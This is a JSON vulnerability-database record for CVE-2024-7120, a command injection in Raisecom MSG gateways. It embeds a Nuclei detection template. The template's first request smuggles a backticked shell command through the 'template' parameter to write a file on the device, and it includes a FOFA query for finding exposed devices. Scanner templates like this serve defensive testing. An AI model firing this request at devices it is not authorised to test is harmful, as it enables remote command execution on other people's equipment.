{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-7120/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-7120/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-7120/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-7120/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-7120/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-7120"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-7120"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-7120.yaml",
    "nuclei_template_severity": "medium",
    "nuclei_template_yaml": "id: CVE-2024-7120\n\ninfo:\n  name: Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection\n  author: pussycat0x\n  severity: medium\n  description: |\n    A vulnerability, which was classified as critical, was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. This affects an unknown part of the file list_base_config.php of the component Web Interface. The manipulation of the argument template leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272451.\n  impact: |\n    Authenticated attackers can execute arbitrary OS commands on the Raisecom gateway devices through command injection, achieving complete system compromise.\n  remediation: |\n    Apply security patches from Raisecom for MSG1200, MSG2100E, MSG2200, and MSG2300 devices running version 3.90 to address the command injection vulnerability.\n  reference:\n    - https://netsecfish.notion.site/Command-Injection-Vulnerability-in-RAISECOM-Gateway-Devices-673bc7d2f8db499f9de7182d4706c707?pvs=4\n    - https://vuldb.com/?ctiid.272451\n    - https://vuldb.com/?id.272451\n    - https://vuldb.com/?submit.380167\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L\n    cvss-score: 6.3\n    cve-id: CVE-2024-7120\n    cwe-id: CWE-78\n    epss-score: 0.934\n    epss-percentile: 0.99837\n  metadata:\n    verified: true\n    max-request: 2\n    fofa-query: '\"<TITLE>Web user login</TITLE>\" && \"<META content\\==MSHTML 6.00.2900.5583\\\" name\\=GENERATOR></HEAD>\"'\n  tags: cve,cve2024,intrusive,raisecom,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{randstr}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60  HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        GET /tmp/info.html HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body_2\n        words:\n          - \"{{randstr}}\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502202c41ac8f7101e9f0c15969ed2692bc4cc309323b37a58a52423a9d54538a7ef1022100fadc822084ba3f542a064097496da7b5e3797dd0029406393135387c604431ff:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-7120"
}